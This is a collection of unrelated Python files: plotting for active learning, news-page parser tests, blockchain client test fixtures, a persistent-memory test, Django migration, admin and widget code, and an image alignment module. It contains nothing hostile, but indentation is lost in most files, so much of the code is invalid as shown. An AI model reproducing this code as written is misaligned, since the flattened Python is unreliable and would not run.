ax1.set_ylim([min(err_list), max(err_list)])
ax1.set_xlim([train_size[0]-1, max(train_size)])
ax2 = fig.add_subplot(212)
ax2.plot(train_size,r2_list,'^--',color='g',lw=3.5)
ax2.set_ylabel(r'r$^{2}$',fontsize=24)
ax2.set_xlabel('AL sample size',fontsize=24)
ax2.tick_params(axis ='both', which ='major', labelsize = 20)
ax2.tick_params(axis ='both', which ='minor', labelsize = 20)
ax2.set_ylim([min(r2_list), max(r2_list)])
ax2.set_xlim([train_size[0]-1, max(train_size)])
plt.tight_layout()
plt.draw()
fig.savefig('AL.png',dpi=300)
xarray = np.array(train_size)
yarray = np.array(err_list)
zarray = np.array(r2_list)
array_err_unscaled = np.array(err_unscaled)
array_r2_unscaled = np.array(r2_unscaled)
indarray = np.array(indlist)
data = np.array([xarray, yarray, zarray, array_err_unscaled, array_r2_unscaled])
data = data.T
indexarray_path = "AL_train_Array.dat"
    if tag is None:
        datafile_path = "AL_history.dat"
    else:
        datafile_path = "AL_history_{}.dat".format(tag)
with open(datafile_path, 'w+') as datafile_id:
np.savetxt(datafile_id, data, fmt=['%d','%f','%f','%f','%f'])
with open(indexarray_path, 'w+') as indexfile_id:
np.savetxt(indexfile_id, indarray, fmt=['%d'])
return fig
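if __name__ == '__main__':
    # Quick smoke test with made-up numbers (illustrative only); it simply
    # exercises the plotting and file-writing code paths above.
    sizes = [10, 20, 30, 40]
    rmse = [0.50, 0.35, 0.22, 0.15]
    r2 = [0.80, 0.88, 0.93, 0.96]
    rmse_unscaled = [5.0, 3.5, 2.2, 1.5]
    r2_unscaled = [0.78, 0.86, 0.92, 0.95]
    indices = [1, 2, 3, 4]
    plot_metric_write(sizes, rmse, r2, rmse_unscaled, r2_unscaled, indices, tag='demo')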
|
"""
Apple Daily (蘋果日報) news decomposition tests
"""
# pylint: disable=duplicate-code
import unittest
import twnews.common
from twnews.soup import NewsSoup
#@unittest.skip
class TestAppleDaily(unittest.TestCase):
"""
    Apple Daily (蘋果日報) news decomposition tests
"""
def setUp(self):
self.dtf = '%Y-%m-%d %H:%M:%S'
def test_01_sample(self):
"""
        Test the Apple Daily sample page
"""
pkgdir = twnews.common.get_package_dir()
nsoup = NewsSoup(pkgdir + '/samples/appledaily.html.xz')
self.assertEqual('appledaily', nsoup.channel)
self.assertIn('和男友口角鎖門吞藥 女墜樓不治', nsoup.title())
self.assertEqual('2016-05-21 11:44:00', nsoup.date().strftime(self.dtf))
self.assertEqual('王煌忠', nsoup.author())
self.assertIn('文心路的一棟住宅大樓', nsoup.contents())
def test_02_mobile(self):
"""
        Test the Apple Daily mobile edition
"""
url = 'https://tw.news.appledaily.com/local/realtime/20181025/1453825'
nsoup = NewsSoup(url, refresh=True)
self.assertEqual('appledaily', nsoup.channel)
self.assertIn('男子疑久病厭世 學校圍牆上吊輕生亡', nsoup.title())
self.assertEqual('2018-10-25 12:03:00', nsoup.date().strftime(self.dtf))
self.assertEqual('江宏倫', nsoup.author())
self.assertIn('台北市北投區西安街二段', nsoup.contents())
def test_03_layouts(self):
"""
        Test Apple Daily real-estate (home.appledaily) layouts
"""
layouts = [
{
'url': 'http://home.appledaily.com.tw/article/index/20190313/38279127',
'title': '潮牌概念店撤離 東區房東陷定位危機',
'date': '2019-03-13 00:00:00',
'author': '唐家儀',
'contents': '英國人氣潮牌Superdry(超級乾燥)位大安區忠孝東路四段的形象概念門市竟已歇業'
}
]
for layout in layouts:
nsoup = NewsSoup(layout['url'], refresh=True, proxy_first=True)
self.assertEqual('appledaily', nsoup.channel)
self.assertIn(layout['title'], nsoup.title())
if nsoup.date() is not None:
self.assertEqual(layout['date'], nsoup.date().strftime(self.dtf))
else:
self.assertEqual(layout['date'], nsoup.date())
self.assertEqual(layout['author'], nsoup.author())
self.assertIn(layout['contents'], nsoup.contents())
|
"""
Configures pytest
"""
import pytest
from snakeskin.protos.common.common_pb2 import (
BlockHeader,
BlockData,
BlockMetadata,
Block
)
from snakeskin.models.block import RawBlock
from snakeskin.models.transaction import DecodedTX
from snakeskin.models import User
@pytest.fixture()
def raw_block():
""" Raw block """
yield RawBlock(
header=BlockHeader(
number=5,
previous_hash=b'12345',
data_hash=b'234567'
),
data=BlockData(
data=[b'']
),
metadata=BlockMetadata(
metadata=[b'']
)
)
@pytest.fixture()
def genesis_block():
""" A genesis block """
with open('network-config/genesis.block', 'rb') as gen_bytes:
gen_block = RawBlock.from_proto(Block.FromString(gen_bytes.read()))
yield gen_block
@pytest.fixture()
def channel_tx():
""" A channel transaction, generated from configtxgen, decoded """
with open('network-config/channel.tx', 'rb') as chan_bytes:
trans = DecodedTX.decode(chan_bytes.read())
yield trans
@pytest.fixture(scope='function')
def org1_user():
""" User with Org1 MSP """
yield User(
name='Org1User',
msp_id='Org1MSP',
cert_path=(
'network-config/crypto/peerOrganizations/org1.com/users/'
'Admin@org1.com/msp/signcerts/Admin@org1.com-cert.pem'
),
key_path=(
'network-config/crypto/peerOrganizations/org1.com/users/'
'Admin@org1.com/msp/keystore/'
'09ac257cbf389db23b05c93f2acdb94093d8397884d19ca8e6e40a515c1ab34a'
'_sk'
)
)
|
#!/usr/bin/python3 -m unittest
#
# test for devdax and hstore
#
# first run ...
# DAX_RESET=1 python3 ~/mcas/src/python/pymm/testing/devdax.py
#
# then re-run ..(as many times as you want, vars will increment)
#
# python3 ~/mcas/src/python/pymm/testing/devdax.py
#
import os
import unittest
import pymm
import numpy as np
def colored(r, g, b, text):
return "\033[38;2;{};{};{}m{} \033[38;2;255;255;255m".format(r, g, b, text)
def log(*args):
print(colored(0,255,255,*args))
class TestDevDaxSupport(unittest.TestCase):
def setUp(self):
self.s = pymm.shelf('myShelf',size_mb=1024,backend='hstore-cc',pmem_path='/dev/dax1.0',force_new=True)
print(self.s.items)
def tearDown(self):
del self.s
def test_check_content(self):
if 'x' in self.s.items:
log('x is there: value={}'.format(self.s.x))
self.s.x += 1.1
else:
log('x is not there!')
self.s.x = 1.0
if 'y' in self.s.items:
log('y is there:')
log(self.s.y)
self.s.y += 1
else:
log('y is not there!')
self.s.y = pymm.ndarray((10,10,),dtype=np.uint32)
self.s.y.fill(0)
print(self.s.items)
if __name__ == '__main__':
    if os.path.exists('/dev/dax1.0'):  # devdax devices are character devices, not directories
unittest.main()
else:
print('Omitting test; no /dev/dax1.0 detected')
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('viewwork', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='menu',
options={'permissions': [('view_full_access', 'View full access'), ('view_read_only', 'View read only')], 'verbose_name': 'Menu item', 'verbose_name_plural': 'Menu items'},
),
]
|
from django.contrib import admin
from .models import Language,Framework,Project,Academic,Profile
# Register your models here.
admin.site.register(Language)
admin.site.register(Framework)
admin.site.register(Project)
admin.site.register(Academic)
admin.site.register(Profile)
|
# -*- coding: utf-8 -*-
import numpy as np
from matplotlib import pyplot as plt
from shapely.geometry import Polygon
from shapely.geometry import LineString
import logging
from .alignSource import alignSource
from .alignDest import alignDest
from .types import alignType
from .types import transformationType
from .transform import transform
from ..utils.roi import cliproi
from ..utils import instance
logger = logging.getLogger(__name__)
class align(object):
"""
Allows for the alignment of several stacks based on one stack.
"Alignment" is the process of determining a transformation between
two images that should represent the same thing but transformed/deformed.
"""
def __init__(
self,
source,
sourcelist,
dest,
destlist,
extension,
stackdim=None,
overwrite=False,
cval=np.nan,
plot=False,
transfotype=transformationType.translation,
):
""""""
# Data IO
self.source = alignSource(source, sourcelist, stackdim=stackdim)
self.dest = alignDest(
dest,
destlist,
extension,
stackdim=self.source.stackdim,
overwrite=overwrite,
)
# Missing data
self.cval = cval
# Transformation settings (set before actual transformation)
try:
one = self.source.dtype.type(1)
except AttributeError:
one = self.source.dtype(1)
self.dtype = (np.float32(1) * one).dtype.type
self.alignonraw = True
self.usekernel = False # Doesn't work well for Elastix!
self.pre_align = {"roi": None, "func": None}
self.pre_transform = {"pad": False}
self.post_transform = {"crop": False}
self.pre_transform_requested = {"pad": False}
self.post_transform_requested = {"crop": False}
self.extend = ((0, 0), (0, 0)) # negative: crop, positive: pad
# Transformation (change of frame matrices, not change of coordinates!)
self.transfotype = transfotype
self.transfos = [self.defaulttransform() for _ in range(self.source.nimages)]
self.pre_transfos = [
self.defaulttransform() for _ in range(self.source.nimages)
]
self.prealign_to_raw = [
self.defaulttransform() for _ in range(self.source.nimages)
]
self.prealign_to_pretransform = [
self.defaulttransform() for _ in range(self.source.nimages)
]
# Plot
self.plotinfo = {"ON": plot, "fig": None, "axes": None}
def defaulttransform(self, ttype=None, dtype=None):
if ttype is None:
ttype = self.transfotype
if dtype is None:
dtype = self.dtype
return transform(ttype, dtype=dtype, cval=self.cval)
def enableplot(self):
self.plotinfo["ON"] = True
def disableplot(self):
self.plotinfo["ON"] = False
def plot(self, img, index, title):
"""Visualize alignment in progress"""
if not self.plotinfo["ON"]:
return
if self.plotinfo["fig"] is None:
self.plotinfo["fig"], self.plotinfo["axes"] = plt.subplots(1, 3)
ax = self.plotinfo["axes"][index]
ax.cla()
if img.size in img.shape:
ax.plot(img.flatten())
else:
# img2 = img.copy()
# img2[np.isnan(img2)] = 0
ax.imshow(img, origin="lower", interpolation="nearest", cmap="jet")
ax.set_title(title)
plt.pause(0.01)
def padfromextend(self):
return (
(max(self.extend[0][0], 0), max(self.extend[0][1], 0)),
(max(self.extend[1][0], 0), max(self.extend[1][1], 0)),
)
def cropfromextend(self, dim1, dim2):
return (
(max(-self.extend[0][0], 0), dim1 - max(-self.extend[0][1], 0)),
(max(-self.extend[1][0], 0), dim2 - max(-self.extend[1][1], 0)),
)
def pad(self, img):
"""Apply padding"""
pad = self.padfromextend()
if np.count_nonzero(pad) != 0:
return np.pad(img, pad, "constant", constant_values=(self.cval, self.cval))
else:
return img
def crop(self, img):
"""Apply cropping"""
dim1, dim2 = img.shape
crop = self.cropfromextend(dim1, dim2)
if (
crop[0][0] != 0
or crop[1][0] != 0
or crop[0][1] != dim1
or crop[1][1] != dim2
):
return img[crop[0][0] : crop[0][1], crop[1][0] : crop[1][1]]
else:
return img
def roi(self, img, roi):
"""Extract ROI"""
[[ya, yb], [xa, xb]] = cliproi(img.shape, roi)
if xb <= xa or yb <= ya:
raise ValueError(
"ROI reduces image size to zero: [{}:{},{}:{}]".format(ya, yb, xa, xb)
)
return img[ya:yb, xa:xb]
def writeimg(self, img, datasetindex, imageindex):
"""Save 1 image in 1 stack."""
self.dest.writeimg(img, datasetindex, imageindex)
def copyimg(self, datasetindex, imageindex):
"""Copy 1 image in 1 stack."""
img = self.readimgraw(datasetindex, imageindex)
self.writeimg(img, datasetindex, imageindex)
def readimgraw(self, datasetindex, imageindex):
"""Read 1 image in 1 stack."""
return self.source.readimgas(datasetindex, imageindex, self.dtype)
def readimgrawprep(self, datasetindex, imageindex):
"""Get raw image, preprocessed for alignment"""
img = self.readimgraw(datasetindex, imageindex)
img = self.dopre_align(img, imageindex)
if 0 in img.shape or len(img.shape) != 2:
raise ValueError(
"Image preprocessed for alignment has shape {}".format(img.shape)
)
return img
def nopre_align(self):
"""
Returns:
bool: True when alignment is done on the raw image
"""
return self.pre_align["roi"] is None
def dopre_align(self, img, i):
if callable(self.pre_align["func"]):
img = self.pre_align["func"](img)
transfo = self.pre_transfos[i]
if not transfo.isidentity():
img = self.execute_transform(img, i, transfo)
if self.pre_align["roi"] is not None:
img = self.roi(img, self.pre_align["roi"])
return img
def nopre_transform(self, i):
"""
Returns:
bool: True when transformation is done on the raw image
"""
return (
np.all(np.asarray(self.extend) <= 0) and self.pre_transfos[i].isidentity()
)
def dopre_transform(self, img, i):
"""Manual transformation before the real transformation (not used in alignment)"""
transfo = self.pre_transfos[i]
if not transfo.isidentity():
img = self.execute_transform(img, i, transfo)
if self.pre_transform["pad"]:
img = self.pad(img)
return img
def nopost_transform(self):
"""
Returns:
bool: True when transformation doesn't have any post processing
"""
return not self.post_transform["crop"]
def dopost_transform(self, img):
"""Manual transformation after the real transformation (not used in alignment)"""
if self.post_transform["crop"]:
img = self.crop(img)
return img
def execute_alignkernel(self, img):
raise NotImplementedError()
def execute_transformkernel(self, img):
raise NotImplementedError()
def absolute_cofs(self, homography=False, include_pre=False):
"""Change-of-frame matrix (i.e. inverse of coordinate transformation matrix)
        to convert each raw image to its aligned version.
The columns of the COF matrix are the coordinates of the new basis vectors with
respect to the old basis vectors. The last column is the origin of the new frame
with respect to the old reference frame.
"""
if self.source.nimages == 0:
return None
if include_pre:
transfos = [
ptr.before(tr) for ptr, tr in zip(self.pre_transfos, self.transfos)
]
else:
transfos = self.transfos
if homography:
return np.array([t.getnumpyhomography() for t in transfos])
else:
return np.array([t.getnumpy() for t in transfos])
def cof_in_raw_frame(self, i):
C = self.prealign_to_raw[i]
C2 = self.transfos[i] # defined in pre-align frame
if C.isidentity():
return C2
else:
return C2.new_frame(C)
def cof_in_pretransform_frame(self, i):
C = self.prealign_to_pretransform[i]
C2 = self.transfos[i] # defined in pre-align frame
if C.isidentity():
return C2
else:
return C2.new_frame(C)
def calccof_prealign_to_raw(self):
"""
Calculate transformation (image alignment):
fixed image: raw -> dopre_align (cof=C1) -> img1
moving image: raw -> dopre_align (cof=C1) -> img2 -> execute_alignkernel(img1,img2) -> img3, C2
C1: raw to pre-align (in order: pretransform, roi)
C2: cof in pre-align frame
"""
CroiInv = self.defaulttransform(ttype=transformationType.translation)
if self.pre_align["roi"] is not None:
# cof raw to pre-align
ty, tx = self.pre_align["roi"][:][0]
# cof pre-align to raw
CroiInv.settranslation(-tx, -ty)
for prealign_to_raw, prealign_to_pretransform, pretransfo in zip(
self.prealign_to_raw, self.prealign_to_pretransform, self.pre_transfos
):
prealign_to_raw.fromtransform(CroiInv)
if not pretransfo.isidentity():
# raw to pre-transform
prealign_to_raw.before_inplace(pretransfo.inverse())
prealign_to_pretransform.fromtransform(prealign_to_raw)
def calccof_prealign_to_pretransform(self):
"""
Apply transformation (image transformation):
aligned image: raw -> dopre_transform (cof=C3) -> img1 -> apply_transform (cof=C2) -> img4 -> dopost_transform (cof=C4) -> img5
C1: raw to pre-align
C2: cof in pre-align frame
C3: raw to pre-transform (in order: pretransform, pad)
C4: post transformation (crop)
"""
Cpad = self.defaulttransform(ttype=transformationType.translation)
if self.pre_transform["pad"]:
# raw to pre-transform
o2min = -max(self.extend[1][0], 0)
o1min = -max(self.extend[0][0], 0)
Cpad.settranslation(o2min, o1min)
for prealign_to_raw, prealign_to_pretransform, pretransfo in zip(
self.prealign_to_raw, self.prealign_to_pretransform, self.pre_transfos
):
prealign_to_pretransform.fromtransform(prealign_to_raw)
if not pretransfo.isidentity():
# raw to pre-transform
prealign_to_pretransform.before(pretransfo)
if self.pre_transform["pad"]:
prealign_to_pretransform.before(Cpad)
def execute_transform(self, img, i, transfo=None):
"""
Transform according to the transformation extracted from
the transformation kernel (see store_transformation).
:param np.ndarray img: in the pre-transform frame
:param int or LinearMapping transfo:
:returns np.ndarray:
"""
if transfo is None:
transfo = self.transfos[i] # defined in pre-align frame
C = self.prealign_to_pretransform[i]
if not C.isidentity():
transfo.new_frame_inplace(C) # now defined in pre-transform frame
if not transfo.isidentity():
if self.usekernel:
self.set_transformkernel(transfo)
return self.execute_transformkernel(img)
else:
return transfo.transformimage(img)
return img
def transformidentity(self, transfo):
"""Is the transformation the identity"""
if instance.isnumber(transfo):
transfo = self.transfos[transfo]
return transfo.isidentity()
def pureidentity(self, i):
"""Is the transformation the identity, including the changes applied
before (padding) and after (cropping)
"""
return (
self.nopre_transform(i)
and self.nopost_transform()
and self.transformidentity(i)
)
def transform(self, img, i):
"""Apply image transformation"""
# Return when transformation is the identity
if self.pureidentity(i):
return img
# Apply initial transformation (not used in alignment)
imgtransformed = self.dopre_transform(img, i)
# Apply transformation
imgtransformed = self.execute_transform(imgtransformed, i)
# plt.figure(5)
# plt.imshow(imgtransformed,origin='lower',interpolation='nearest',cmap='jet')
# plt.pause(1)
# Apply final transformation (not used in alignment)
imgtransformed = self.dopost_transform(imgtransformed)
return imgtransformed
def get_alignkernel(self):
"""Get transformation from align kernel."""
raise NotImplementedError()
def set_transformkernel(self, transfo):
"""Set transformation in transform kernel"""
raise NotImplementedError()
def store_transformation(self, i, pairwise):
"""
Store transformation from align kernel for usage
in transform kernel
"""
transfo = self.get_alignkernel()
# pairwise: transfo relative to previous
# not pairwise: transfo relative to i=iref
if pairwise and i != 0 and self.alignonraw:
# make transfo relative to i=0
self.transfos[i].fromtransform(self.transfos[i - 1].before(transfo))
else:
self.transfos[i].fromtransform(transfo)
def settransformidentity(self, i):
"""Make this transformation the identity"""
self.transfos[i].setidentity()
def genpolygon(self, lst):
p = Polygon(lst)
if p.area == 0:
p = LineString(lst)
return p
def polygonempty(self, p):
if isinstance(p, Polygon):
return p.area == 0
else:
return p.length == 0
def untransformedimagepolygon(self):
add0 = 0.0
add1 = 0.0
return self.genpolygon(
[
(add0, add0),
(self.source.imgsize[1] - 1 + add1, add0),
(self.source.imgsize[1] - 1 + add1, self.source.imgsize[0] - 1 + add1),
(add0, self.source.imgsize[0] - 1 + add1),
]
)
def transformedimagepolygons(self):
add0 = 0.0
add1 = 0.0
# Corners of the image in the transformed frame: A'
xy = np.empty((3, 4))
xy[0, :] = [
add0,
self.source.imgsize[1] - 1 + add1,
self.source.imgsize[1] - 1 + add1,
add0,
] # x
xy[1, :] = [
add0,
add0,
self.source.imgsize[0] - 1 + add1,
self.source.imgsize[0] - 1 + add1,
] # y
xy[2, :] = [1, 1, 1, 1]
# Corners of the image in the raw frame: A = C.A'
ret = [None] * self.source.nimages
for i in range(self.source.nimages):
xy2 = self.cof_in_raw_frame(i).transformcoordinates(
xy
) # C1^(-1).C2^(-1).C1.XY
xy2[0, :] /= xy2[2, :]
xy2[1, :] /= xy2[2, :]
ret[i] = self.genpolygon(xy2[0:2, :].T)
return ret
def polygoncollectionbounds(self, ps, pad=True):
p = ps[0]
if pad:
for i in range(1, len(ps)):
p = p.union(ps[i])
else:
for i in range(1, len(ps)):
p = p.intersection(ps[i])
if self.polygonempty(p):
logger.warning("Cropping skipped because there would be nothing left.")
return ()
xmin, ymin, xmax, ymax = p.bounds
xmin = int(np.floor(xmin))
ymin = int(np.floor(ymin))
xmax = int(np.ceil(xmax))
ymax = int(np.ceil(ymax))
return xmin, ymin, xmax, ymax
def minimaltransformation(self, p0, ps, centroids=False):
"""If all transformations are known, they can be reduced to minimize
the difference with the original image
"""
# return
if centroids:
# Put average centroids in the middle
x0, y0 = p0.centroid.coords.xy
xy = np.array([p.centroid.coords.xy for p in ps])
x0 = x0[0]
y0 = y0[0]
x = np.mean(xy[:, 0])
y = np.mean(xy[:, 1])
else:
# Center total boundary
xmin0, ymin0, xmax0, ymax0 = p0.bounds
xmin, ymin, xmax, ymax = self.polygoncollectionbounds(ps)
x0 = np.mean([xmin0, xmax0])
y0 = np.mean([ymin0, ymax0])
x = np.mean([xmin, xmax])
y = np.mean([ymin, ymax])
# Center
trn = self.defaulttransform(ttype=transformationType.translation)
trn.settranslation(x - x0, y - y0)
for t in self.transfos:
t.before_inplace(trn)
def setextend(self, xmin, ymin, xmax, ymax):
# Padding/cropping <> positive/negative
o1min = -ymin
o1max = ymax - self.source.imgsize[0] + 1
o2min = -xmin
o2max = xmax - self.source.imgsize[1] + 1
self.extend = ((o1min, o1max), (o2min, o2max))
self.pre_transform["pad"] = np.any(np.asarray(self.extend) > 0)
self.post_transform["crop"] = np.any(np.asarray(self.extend) < 0)
def extendfromtransformation(self, p0, ps):
"""If all transformations are known, padding/cropping can be calculated"""
self.extend = ((0, 0), (0, 0))
# Smallest rectangle that contains the union (pad)
# or intersection (crop) of all polygons
tmp = self.polygoncollectionbounds(ps, pad=self.pre_transform_requested["pad"])
if len(tmp) != 4:
self.pre_transform["pad"] = False
self.post_transform["crop"] = False
return
self.setextend(*tmp)
def bextendfrommask(self, pairwise):
return (
self.post_transform_requested["crop"]
and self.cval is np.nan
and (
self.pre_align["roi"] is None
or self.transfotype == transformationType.translation
)
and not pairwise
)
def setextendmask(self, img, reset=False):
mask = np.logical_not(np.isnan(img))
# if self.cval is np.nan:
# mask = np.logical_not(np.isnan(img))
# else:
# mask = img != self.cval
if reset:
self._extendmask = mask
else:
self._extendmask &= mask
def extendfrommask(self):
"""If all transformations are applied, padding/cropping can be calculated"""
indvalidrow = np.argwhere(self._extendmask.sum(axis=1))
indvalidcol = np.argwhere(self._extendmask.sum(axis=0))
# When pre_align["roi"]: only valid for translations
ymin = indvalidrow[0][0]
ymax = indvalidrow[-1][0] - self._extendmask.shape[0] + self.source.imgsize[0]
xmin = indvalidcol[0][0]
xmax = indvalidcol[-1][0] - self._extendmask.shape[1] + self.source.imgsize[1]
self.setextend(xmin, ymin, xmax, ymax)
def parsetransformation_beforeapplication(self, pairwise):
"""Adapt transformations before applying them"""
if self.bextendfrommask(pairwise):
self.extendfrommask()
else:
# Corners of the image in the transformed frame
p0 = self.untransformedimagepolygon()
# Corners of the transformed image in the raw frame
ps = self.transformedimagepolygons()
# Adapt transformation
if (
self.pre_transform_requested["pad"]
or self.post_transform_requested["crop"]
):
# adapt self.extend to either crop or pad
self.extendfromtransformation(p0, ps)
else:
# try to fit as much data in the original image size as possible
self.minimaltransformation(p0, ps)
self.calccof_prealign_to_pretransform()
def transform_axes(self, axes):
"""Image X and Y axes after transformation
Args:
list(array)
Returns:
list(array)
"""
if not self.pre_transform["pad"] and not self.post_transform["crop"]:
return axes
if self.source.stackdim == 2:
ind = [0, 1]
elif self.source.stackdim == 1:
ind = [0, 2]
else:
ind = [1, 2]
out = list(axes)
for i in range(len(ind)):
j = ind[i]
nleft = self.extend[i][0]
nright = self.extend[i][1]
naxis = len(axes[j])
newaxis = np.empty(naxis + nleft + nright, dtype=axes[j].dtype)
off0 = 0
axis0 = 0
axisn = naxis
if nleft < 0:
axis0 -= nleft
else:
off0 += nleft
if nright < 0:
axisn += nright
offn = off0 + axisn - axis0
if nleft > 0:
delta = axes[j][1] - axes[j][0]
newaxis[0:nleft] = (axes[j][0] - delta * nleft) + delta * np.arange(
nleft
)
newaxis[off0:offn] = axes[j][axis0:axisn]
if nright > 0:
delta = axes[j][-1] - axes[j][-2]
newaxis[offn:] = (axes[j][-1] + delta) + delta * np.arange(nright)
out[j] = newaxis
return out
def getaxesaftertransformation(self, axes):
"""Image X and Y axes after transformation
Args:
list(array)
"""
if not self.pre_transform["pad"] and not self.post_transform["crop"]:
return
if self.source.stackdim == 2:
ind = [0, 1]
elif self.source.stackdim == 1:
ind = [0, 2]
else:
ind = [1, 2]
for i in range(len(ind)):
j = ind[i]
nleft = self.extend[i][0]
nright = self.extend[i][1]
naxis = len(axes[j])
newaxis = np.empty(naxis + nleft + nright, dtype=axes[j].dtype)
off0 = 0
axis0 = 0
axisn = naxis
if nleft < 0:
axis0 -= nleft
else:
off0 += nleft
if nright < 0:
axisn += nright
offn = off0 + axisn - axis0
if nleft > 0:
delta = axes[j][1] - axes[j][0]
newaxis[0:nleft] = (axes[j][0] - delta * nleft) + delta * np.arange(
nleft
)
newaxis[off0:offn] = axes[j][axis0:axisn]
if nright > 0:
delta = axes[j][-1] - axes[j][-2]
newaxis[offn:] = (axes[j][-1] + delta) + delta * np.arange(nright)
axes[j] = newaxis
def dest_imgsize(self, nopost=False):
imgsize = self.source.imgsize
if self.pre_transform["pad"] or (self.post_transform["crop"] and not nopost):
imgsize = (
imgsize[0] + self.extend[0][0] + self.extend[0][1],
imgsize[1] + self.extend[1][0] + self.extend[1][1],
)
return imgsize
def preparedestination(self, img=None):
"""Allocate space for saving results"""
if img is not None:
self.setup_post_transform(img)
nimages = self.source.nimages
imgsize = self.dest_imgsize()
self.dest.prepare(nimages, imgsize, self.dtype)
def set_reference(self, img, previous=False):
raise NotImplementedError()
def doalign(self, refdatasetindex, refimageindex=None, aligntype=alignType.full):
"""Align datasets and save the result."""
pairwise = refimageindex is None
# Prepare destination (will be done after alignment)
if aligntype != alignType.calctransfo:
self.preparedestination()
# First reference image
if aligntype != alignType.usetransfo:
if pairwise:
# Pair-wise alignment: first image is the first reference
imgref = self.readimgrawprep(refdatasetindex, 0)
iref = 0
else:
# Fixed-reference alignment
rawprep = self.readimgrawprep(refdatasetindex, refimageindex)
iref = refimageindex
self.plot(rawprep, 0, "Reference %d (fixed)" % iref)
self.set_reference(rawprep)
# from pympler import tracker
# tr = tracker.SummaryTracker()
# s1 = None
# Loop over the images
bfirst = True
for i in range(self.source.nimages):
if aligntype != alignType.usetransfo:
# Image i
rawprep = self.readimgrawprep(refdatasetindex, i)
# np.save("img{}.npy".format(i),rawprep)
# Update fixed image
if pairwise:
self.set_reference(imgref)
# Get align transformation
logger.debug("Align image %d on %d" % (i, iref))
if i == iref:
self.settransformidentity(i)
imgaligned = rawprep
else:
# Align image i to reference
# if s1 is None:
# s1 = tr.create_summary()
imgaligned = self.execute_alignkernel(rawprep)
# s2 = tr.create_summary()
# tr.print_diff(summary1=s1,summary2=s2)
if pairwise:
self.plot(imgref, 0, "Reference %d (pair-wise)" % (iref))
self.plot(rawprep, 2, "To align %d" % i)
self.plot(imgaligned, 1, "Aligned %d" % i)
self.store_transformation(i, pairwise)
logger.debug("Change-of-frame {}".format(self.transfos[i]))
# Reference for the next image
if pairwise:
if self.alignonraw:
imgref = rawprep
else:
imgref = imgaligned
iref = i
# Only calculation
if aligntype == alignType.calctransfo:
# TODO: This is still not good enough because
# align and transformation kernels could be different kernels
if self.bextendfrommask(pairwise):
self.setextendmask(imgaligned, reset=bfirst)
bfirst = False
continue # no results needed
# Save the transformed image i of all datasets
if self.pureidentity(i):
for j in range(self.source.nsets):
self.copyimg(j, i)
else:
for j in range(self.source.nsets):
usealignedimage = (
aligntype != alignType.usetransfo
and j == refdatasetindex
and self.nopre_align()
and self.nopre_transform(i)
and self.nopost_transform()
)
if usealignedimage:
img = imgaligned
else:
img = self.readimgraw(j, i)
img = self.transform(img, i)
self.writeimg(img, j, i)
def prepare_pre_align(self, roi=None, transfo=None):
if not isinstance(transfo, (list, tuple)):
if transfo is None:
transfo = self.defaulttransform()
transfo = [transfo] * self.source.nimages
self.pre_transfos = transfo
if roi is None:
self.pre_align["roi"] = None
else:
def bdefault(a):
if a is None:
return 0
else:
return a
def edefault(a):
if a is None:
return -1
else:
return a
self.pre_align["roi"] = (
(bdefault(roi[0][0]), edefault(roi[0][1])),
(bdefault(roi[1][0]), edefault(roi[1][1])),
)
self.calccof_prealign_to_raw()
def align(
self,
refdatasetindex,
refimageindex=None,
onraw=False,
pad=True,
crop=False,
redo=False,
roi=None,
rawcalc=None,
prealigntransfo=None,
):
"""Alignment function that needs to be called
Args:
refdatasetindex(int): stack to be used for alignment
refimageindex(Optional(int)): fixed reference to align on
pairwise alignment when None
onraw(Optional(bool)): when doing pairwise alignment, use the
previous raw or aligned images to align
the next one on
pad(Optional(bool)): make sure nothing is transformed outside
the field of view (has priority over crop)
crop(Optional(bool)): make sure no missing data is added
redo(Optional(bool)): apply transformations without recalculating
them (all other keywords are ignored)
            roi(Optional(array-like)): use only part of the image to align
rawcalc(Optional(callable)): apply function to raw data before
alignment (not used in transformation)
prealigntransfo(Optional(list(LinearMapping))): apply to raw data before alignment
                (propagates to the transformation)
"""
if redo:
self.doalign(refdatasetindex, aligntype=alignType.usetransfo)
else:
pairwise = refimageindex is None
if pairwise:
self.alignonraw = onraw
else:
self.alignonraw = True
self.prepare_pre_align(roi=roi, transfo=prealigntransfo)
self.pre_transform_requested["pad"] = pad
self.post_transform_requested["crop"] = crop
self.pre_transform["pad"] = pad
self.post_transform["crop"] = crop
# center = False
if roi or pad or crop or callable(rawcalc) or prealigntransfo:
# Do not use transformed image of alignment procedure
self.pre_align["func"] = rawcalc
self.doalign(
refdatasetindex,
refimageindex=refimageindex,
aligntype=alignType.calctransfo,
)
self.pre_align["func"] = None
self.parsetransformation_beforeapplication(pairwise)
self.doalign(refdatasetindex, aligntype=alignType.usetransfo)
else:
# Use transformed image of alignment procedure
self.doalign(refdatasetindex, refimageindex=refimageindex)
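# -----------------------------------------------------------------------------
# Minimal subclass sketch (illustrative only, not part of the original module).
# The base class leaves the alignment and transformation kernels abstract; the
# stub below only shows which hooks a concrete backend is expected to implement.
# It performs no real registration (every image is "aligned" with the identity
# transformation), so it is only useful for exercising the bookkeeping in
# doalign/transform.
class identityalign(align):
    def __init__(self, *args, **kwargs):
        super(identityalign, self).__init__(*args, **kwargs)
        self._kernel_transfo = self.defaulttransform()
    def set_reference(self, img, previous=False):
        # A real backend would store the fixed (reference) image here.
        pass
    def execute_alignkernel(self, img):
        # A real backend would estimate the transformation between the
        # reference image and img; here the identity is always reported.
        self._kernel_transfo = self.defaulttransform()
        return img
    def get_alignkernel(self):
        return self._kernel_transfo
    def set_transformkernel(self, transfo):
        self._kernel_transfo = transfo
    def execute_transformkernel(self, img):
        return self._kernel_transfo.transformimage(img)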
|
from django.forms import widgets, MultiValueField, DateField
class DatePickerWidget(widgets.DateInput):
def __init__(self, attrs=None, format='%Y-%m-%d'):
# Use the HTML date widget
if attrs is not None:
attrs.update({'type': 'date'})
else:
attrs = {'type': 'date'}
super().__init__(attrs=attrs, format=format)
class DateTimePickerWidget(widgets.DateTimeInput):
def __init__(self, attrs=None, format='%Y-%m-%dT%H:%M'):
# Use the HTML datetime-local widget
if attrs is not None:
attrs.update({'type': 'datetime-local'})
else:
attrs = {'type': 'datetime-local'}
super().__init__(attrs=attrs, format=format)
class DateRangeWidget(widgets.MultiWidget):
def __init__(self, **kwargs):
super().__init__(
widgets=[DatePickerWidget, DatePickerWidget],
)
def decompress(self, value):
        # MultiWidget expects a list of sub-values; guard against None.
        if value is None:
            return [None, None]
        return value
class RangeField(MultiValueField):
